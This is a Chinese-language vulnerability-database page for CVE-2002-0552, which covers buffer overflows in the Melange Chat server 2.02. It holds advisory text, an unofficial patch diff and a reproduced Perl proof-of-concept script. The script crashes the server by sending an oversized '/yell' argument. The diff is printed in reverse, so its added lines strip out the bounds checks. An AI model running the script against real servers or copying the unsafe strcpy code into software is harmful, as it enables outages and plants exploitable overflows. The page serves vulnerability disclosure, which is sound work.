CVE-2002-0552
CVSS7.5
发布时间 :2002-07-03 00:00:00
修订时间 :2008-09-05 16:28:19
NMCOES    

[原文]Multiple buffer overflows in Melange Chat server 2.02 allow remote or local attackers to cause a denial of service (crash) and possibly execute arbitrary code via (1) a long argument in the /yell command, (2) long lines in the /etc/melange.conf configuration file, (3) long file names, or possibly other attacks.


[CNNVD]Melange聊天系统melange.conf配置行处理存在缓冲区溢出漏洞(CNNVD-200207-035)

        
        Melange是一款Christian Walter开发的聊天服务程序,当前程序作者已经没有对这个应用程序进行维护。
        Melange在对melange.conf配置文件中的配置行内容缺少正确的边界检查,可导致缓冲溢出。
        本地攻击者可以编译melange.conf配置文件,在配置文件中插入超长的一行内容就可以导致melange产生缓冲溢出,导致拒绝服务攻击,或以melange进程的权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0552
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0552
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/8845.php
(VENDOR_ADVISORY)  XF  melange-chat-config-bo(8845)
http://www.securityfocus.com/bid/4510
(VENDOR_ADVISORY)  BID  4510
http://www.securityfocus.com/bid/4509
(UNKNOWN)  BID  4509
http://www.securityfocus.com/bid/4508
(UNKNOWN)  BID  4508
http://www.iss.net/security_center/static/8846.php
(UNKNOWN)  XF  melange-chat-filename-bo(8846)
http://www.iss.net/security_center/static/8842.php
(UNKNOWN)  XF  melange-chat-yell-bo(8842)
http://online.securityfocus.com/archive/1/267932
(UNKNOWN)  BUGTRAQ  20020416 Melange Chat POC DOS
http://archives.neohapsis.com/archives/bugtraq/2002-04/0157.html
(VENDOR_ADVISORY)  BUGTRAQ  20020414 Vulnerabilities in the Melange Chat Server

- 漏洞信息

Melange聊天系统melange.conf配置行处理存在缓冲区溢出漏洞
高危 边界条件错误
2002-07-03 00:00:00 2006-09-21 00:00:00
本地  
        
        Melange是一款Christian Walter开发的聊天服务程序,当前程序作者已经没有对这个应用程序进行维护。
        Melange在对melange.conf配置文件中的配置行内容缺少正确的边界检查,可导致缓冲溢出。
        本地攻击者可以编译melange.conf配置文件,在配置文件中插入超长的一行内容就可以导致melange产生缓冲溢出,导致拒绝服务攻击,或以melange进程的权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        没有合适的临时解决方法。
        厂商补丁:
        Christian Walter
        ----------------
        Leon Harris (leon@quoll.com)提供如下补丁:
        diff -Naur server/atool.c ../melange-2.02-beta2/server/atool.c
        --- server/atool.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/atool.c Sun Dec 5 22:39:51 1999
        @@ -94,7 +94,7 @@
         strcpy(parameter,data);
        
         #ifdef DEBUG
        - snprintf(server.log.txt,sizeof(server.log.txt),"DEBUG (ATOOL): com: <> opt: <> par: <> at slot %d.\r\n",command,option,parameter,sender);
        + sprintf(server.log.txt,"DEBUG (ATOOL): com: <> opt: <> par: <> at slot %d.\r\n",command,option,parameter,sender);
         util_WriteLog(LL_DEBUG);
         #endif
        
        diff -Naur server/auth.c ../melange-2.02-beta2/server/auth.c
        --- server/auth.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/auth.c Sun Dec 5 22:40:10 1999
        @@ -84,8 +84,6 @@
         if (util_isSet(UNIQUENICKS)==YES) {
         if ((util_isSet(GUESTLOGIN)==YES)&&(strcasecmp(client->name,"guest")==0)) {
         sprintf(salt,"%d%c",mySlot,0);
        - if (strlen(salt) + strlen(client->name) > sizeof(client->name))
        - return(ERR_NAME);
         strcat(client->name,salt);
         }
         else {
        diff -Naur server/chatutil.c ../melange-2.02-beta2/server/chatutil.c
        --- server/chatutil.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/chatutil.c Sun Dec 5 22:40:22 1999
        @@ -64,7 +64,7 @@
         sprintf(txt,MSG_LEAVE,slotID,slot[slotID].user->name);
         comm_SendChannelBut(SYSMSG,myChannel,slotID,txt);
         util_WriteMsgLog(txt);
        - strncpy(server.log.txt,txt,sizeof(server.log.txt));
        + strcpy(server.log.txt,txt);
         util_WriteLog(LL_NORMAL);
         }
        
        @@ -134,4 +134,4 @@
         if (slot[mySlot].user!=NULL)
         free(slot[mySlot].user);
         slot[mySlot].user=NULL;
        -}
        +}
        \ No newline at end of file
        diff -Naur server/client.c ../melange-2.02-beta2/server/client.c
        --- server/client.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/client.c Sun Dec 5 22:40:34 1999
        @@ -175,9 +175,9 @@
         if (util_GetNextSubString(inBuffer,cmd,MBUFFSIZE)!=OK)
         if ((strlen(inBuffer)>0)&&(strlen(inBuffer)<(MBUFFSIZE-2)))
         strcpy(cmd,inBuffer);
        - util_GetNextSubString(inBuffer,name,sizeof(client->name));
        - util_GetNextSubString(inBuffer,password,sizeof(client->passwd));
        - util_GetNextSubString(inBuffer,channel,sizeof(client->channel));
        + util_GetNextSubString(inBuffer,name,MBUFFSIZE);
        + util_GetNextSubString(inBuffer,password,MBUFFSIZE);
        + util_GetNextSubString(inBuffer,channel,MBUFFSIZE);
         if ((strlen(inBuffer)>0)&&(strlen(inBuffer)<(MBUFFSIZE-2)))
         strcpy(group,inBuffer);
        
        diff -Naur server/commands.c ../melange-2.02-beta2/server/commands.c
        --- server/commands.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/commands.c Sun Dec 5 22:41:05 1999
        @@ -135,7 +135,7 @@
         int i;
         char message[500];
        
        - snprintf(message,sizeof(message)," ",message1);
        + sprintf(message," ",message1);
         if (strlen(message2)>0)
         strcat(message,message2);
         for (i=0;i        @@ -513,7 +513,7 @@
         }
         }
         sprintf(txt,MSG_NEWNAME,user,slot[user].user->name,myNewNick);
        - strncpy(slot[user].user->name,myNewNick,sizeof(slot[user].user->name));
        + strcpy(slot[user].user->name,myNewNick);
         comm_SendGroupBut(SYSMSG,user,txt);
         sprintf(txt,MSG_YOURNEWNAME,myNewNick,user);
         comm_SendTo(SYSMSG,user,txt);
        diff -Naur server/interpret.c ../melange-2.02-beta2/server/interpret.c
        --- server/interpret.c Sat Jan 12 23:12:40 2002
        +++ ../melange-2.02-beta2/server/interpret.c Sun Dec 5 22:41:41 1999
        @@ -56,22 +56,22 @@
        
         strcpy(data,util_FitString(data));
        
        - if ( (strlen(data)<2) || (strlen(data) > 500 ) ) /* Can't be a command ! */
        + if (strlen(data)<2) /* Can't be a command ! */
         return(ERR_ILLEGALCMD);
        
         if (util_GetNextSubString(data,command,MBUFFSIZE)!=OK) /* Get command */
         if ((strlen(data)>0)&&(strlen(data)<(MBUFFSIZE-2)))
        - strncpy(command,data,sizeof(command));
        + strcpy(command,data);
         if (util_GetNextSubString(data,option,MBUFFSIZE)!=OK) /* Get option */
         if ((strlen(data)>0)&&(strlen(data)<(MBUFFSIZE-2)))
        - strncpy(option,data,sizeof(option));
        + strcpy(option,data);
         if ((strlen(data)>0)&&(strlen(data)<(MMAXTXTLEN-MBUFFSIZE))) /* Get parameter */
        - strncpy(parameter,data,sizeof(parameter));
        + strcpy(parameter,data);
         command[0]='/';
        
        
         #ifdef DEBUG
        - snprintf(server.log.txt,sizeof(server.log.txt),"DEBUG (User): com: <> opt: <> par: <> slot %d !\r\n",command,option,parameter,sender);
        + sprintf(server.log.txt,"DEBUG (User): com: <> opt: <> par: <> slot %d !\r\n",command,option,parameter,sender);
         util_WriteLog(LL_DEBUG);
         #endif
        
        diff -Naur server/main.c ../melange-2.02-beta2/server/main.c
        --- server/main.c Sat Jan 12 23:11:19 2002
        +++ ../melange-2.02-beta2/server/main.c Sun Dec 5 22:41:52 1999
        @@ -49,12 +49,12 @@
        
         printf ("(C) 1998,1999 by Christian Walter, All rights reserved\r\n
        http://melange.terminal.at
Email: chris@terminal.at\r\n\n",PRGVERSION);
         server.port=PORT;
        - strncpy(server.configFileName,CONFIGFILE,sizeof(server.configFileName));
        + strcpy(server.configFileName,CONFIGFILE);
         for (i=1;i         if ((strcasecmp(argv[i],"-p")==0)&&((i+1)         server.port=atoi(argv[i+1]);
         if ((strcasecmp(argv[i],"-c")==0)&&((i+1)        - strncpy(server.configFileName,argv[i+1],sizeof(server.configFileName));
        + strcpy(server.configFileName,argv[i+1]);
         }
         util_ChatInit();
        

- 漏洞信息 (21379)

Melange Chat System 2.0.2 Beta 2 /yell Remote Buffer Overflow Vulnerability (EDBID:21379)
multiple dos
2002-04-14 Verified
0 DVDMAN
N/A [点击下载]
source: http://www.securityfocus.com/bid/4508/info

Melange Chat System is a chat server program developed by Christian Walter. Currently support for this application is no longer available.

Due to inadequate bounds checking in Melange, it is possible for users to initiate a buffer overflow.

Submitting an unusually large /yell argument composed of arbitrary data, could cause the overflow to occur. 

#!/usr/bin/perl
#Melange Chat Server Remote DDOS POC
#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY


use Getopt::Std;
use IO::Socket;
$|=1;


my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_melage();
}
if ($options{p})
{
do_malange();
}
else
{
usage();
}
sub usage()
{
    print("[L33TSECURITY] Malange Chat Remote DDOS\n");
    print(" (C) DVDMAN \n\n");
    print("Usage: $0 [options]\n");
    print("-H = hostname or ip REQUIRED\n");
    print("-p = port of ftp server REQUIRED\n");
}
  
exit(1);

 

sub malange() {
my $test = $options{H};
my $test2 = $options{p};

    $remote = IO::Socket::INET->new(
                        Proto     => "tcp",
                                PeerAddr  => $test,
                                PeerPort  => $test2,
        );
    unless ($remote) {
           print"error cannot connect";
           return
        }
    $remote->autoflush(1);


print STDERR "Melange Chat Server REMOTE DDOS BY DVDMAN\n";
print STDERR " starting attack in 5 seconds...\n";
sleep(5);

my $user = "user test test 0 0\r\n";
my $exploit = "/yell" . " " . "A"x600;


print $remote $user;
print $remote $exploit;
print STDERR "DONE\n"; 
die "BYE\n";
}





#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY

		

- 漏洞信息

10393
Melange Chat Server Yell Command Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-04-14 Unknow
2002-04-14 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Melange Chat System Long Filename Buffer Overflow Vulnerability
Boundary Condition Error 4510
No Yes
2002-04-14 12:00:00 2009-07-11 11:56:00
Discovered by Leon Harris <leon@quoll.com>.

- 受影响的程序版本

Melange Melange Chat System 2.0.2 Beta 2

- 漏洞讨论

Melange Chat Systems is a chat application developed by Christian Walter. Currently support for this application is no longer available.

An issue has been reported in Melange Chat Systems, which could allow a user to initiate a buffer overflow.

The overflow occurs if the configuration file is renamed with an unusually long filename.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The discoverer of this issue Leon Harris <leon@quoll.com>, has released a patch for this issue. Administrators who intend to apply this patch should be aware that this is an unofficial patch, and should be handled accordingly. The patch is available in the message listed in the references section of this alert.

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站